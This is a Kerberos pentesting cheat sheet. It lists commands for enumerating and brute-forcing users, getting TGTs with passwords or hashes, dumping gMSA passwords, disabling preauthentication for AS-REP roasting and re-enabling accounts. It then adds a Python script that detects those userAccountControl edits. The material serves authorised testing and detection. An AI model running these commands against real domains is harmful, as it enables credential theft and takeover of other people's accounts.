# Kerberos Pentesting

Kerberos is an authentication protocol used to verify the identity of a user or host. It uses cryptography for authentication and consists of the client, the server, and the Key Distribution Center (KDC). The default port is 88. Kerberos also uses port 464 for changing passwords.

### Enumeration <a href="#enumeration" id="enumeration"></a>

To enumerate automatically, you can use nmap.

```
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='example.local' -p 88 <target-ip>

# --dc: domain controller
# -d: domain
# combos.txt: each line of the wordlist must be a "username:password" combination.
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt
# User enumeration
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
# Brute force a single user's password
kerbrute bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username
```

#### AS-REP Roasting <a href="#as-rep-roasting" id="as-rep-roasting"></a>

We might be able to find password hashes of user accounts that do not require preauthentication.\
Please see [AS-REP Roasting](https://exploit-notes.hdks.org/exploit/windows/active-directory/asrep-roasting/).

#### Kerberoasting Attack <a href="#kerberoasting-attack" id="kerberoasting-attack"></a>

If we have the password of some user, we might be able to gather other users' credentials.\
Please see [Kerberoasting Attack](https://exploit-notes.hdks.org/exploit/windows/active-directory/kerberoasting/).

#### Get TGT <a href="#get-tgt" id="get-tgt"></a>

```
impacket-getTGT -dc-ip <target-ip> example.local/<username>:<password>
# or
impacket-getTGT -dc-ip <target-ip> example.local/<username> -hashes <ntlm_hash>

# If a TGT is found, set the environment variable for further testing
export KRB5CCNAME=<username>.ccache
```

If we get a TGT of some user, we can use it for login or further enumeration.

#### Get Password Hashes <a href="#get-password-hashes" id="get-password-hashes"></a>

```
# Get the password of the Group Managed Service Account (gMSA)
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password get object 'gMSA01$' --attr msDS-ManagedPassword
# -k: Use Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k get object 'gMSA01$' --attr msDS-ManagedPassword
```

### Account Manipulation <a href="#account-manipulation" id="account-manipulation"></a>

If a user has permission to modify access control for another user, we can manipulate that user's configuration.

#### Disable Preauth <a href="#disable-preauth" id="disable-preauth"></a>

```
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -u username -p password add uac <username> -f DONT_REQ_PREAUTH
# -k: With Kerberos authentication
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k add uac <username> -f DONT_REQ_PREAUTH
```

If successful, an AS-REP Roasting attack could be used to obtain user password hashes.

#### Activate Accounts <a href="#activate-accounts" id="activate-accounts"></a>

If some users are disabled, we can activate them.

```
bloodyAD --host dc.example.local --dc-ip <target-ip> -d example.local -k remove uac <username> -f ACCOUNTDISABLE
```
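The two edits in this section each flip one bit of userAccountControl, so a defender can catch them by diffing two directory exports. The following audit is an added example, not code from the page or from bloodyAD; the account names and snapshots are constructed, and the bit values are Microsoft's documented userAccountControl constants.

```python
# Audit userAccountControl for the two edits above: DONT_REQ_PREAUTH set
# (account becomes AS-REP roastable) and ACCOUNTDISABLE cleared (re-enabled).
# Added example, not from the page or bloodyAD; names/snapshots constructed.

# userAccountControl bit values (Microsoft-documented constants)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000
FLAG_NAMES = {
    ACCOUNTDISABLE: "ACCOUNTDISABLE",
    NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    DONT_EXPIRE_PASSWORD: "DONT_EXPIRE_PASSWORD",
    DONT_REQ_PREAUTH: "DONT_REQ_PREAUTH",
}

def decode_uac(value):
    """Return the set of known flag names set in a userAccountControl value."""
    return {name for bit, name in FLAG_NAMES.items() if value & bit}

def roastable_accounts(snapshot):
    """Enabled accounts that do not require preauth, i.e. AS-REP roastable."""
    return sorted(sam for sam, uac in snapshot.items()
                  if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE)

def uac_changes(before, after):
    """Diff two {sAMAccountName: userAccountControl} snapshots and report
    the changes that matter here: preauth disabled, account re-enabled."""
    findings = []
    for sam, new in after.items():
        old = before.get(sam, 0)          # unseen account: every bit is new
        added = decode_uac(new & ~old)    # bits set now but not in baseline
        removed = decode_uac(old & ~new)  # bits cleared since the baseline
        if "DONT_REQ_PREAUTH" in added:
            findings.append((sam, "preauth disabled"))
        if "ACCOUNTDISABLE" in removed:
            findings.append((sam, "account re-enabled"))
    return findings

# Constructed snapshots, like two LDAP exports taken before and after the edits
BASELINE = {"alice": NORMAL_ACCOUNT,
            "svc_backup": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
            "old_admin": NORMAL_ACCOUNT | ACCOUNTDISABLE}
LATEST = {"alice": NORMAL_ACCOUNT,
          "svc_backup": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH,
          "old_admin": NORMAL_ACCOUNT}

if __name__ == "__main__":
    for sam, what in uac_changes(BASELINE, LATEST):
        print(f"{sam}: {what}")
```

In practice the snapshots come from an LDAP query for sAMAccountName and userAccountControl, and a new account created with DONT_REQ_PREAUTH already set is reported as well, since its baseline value is 0.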
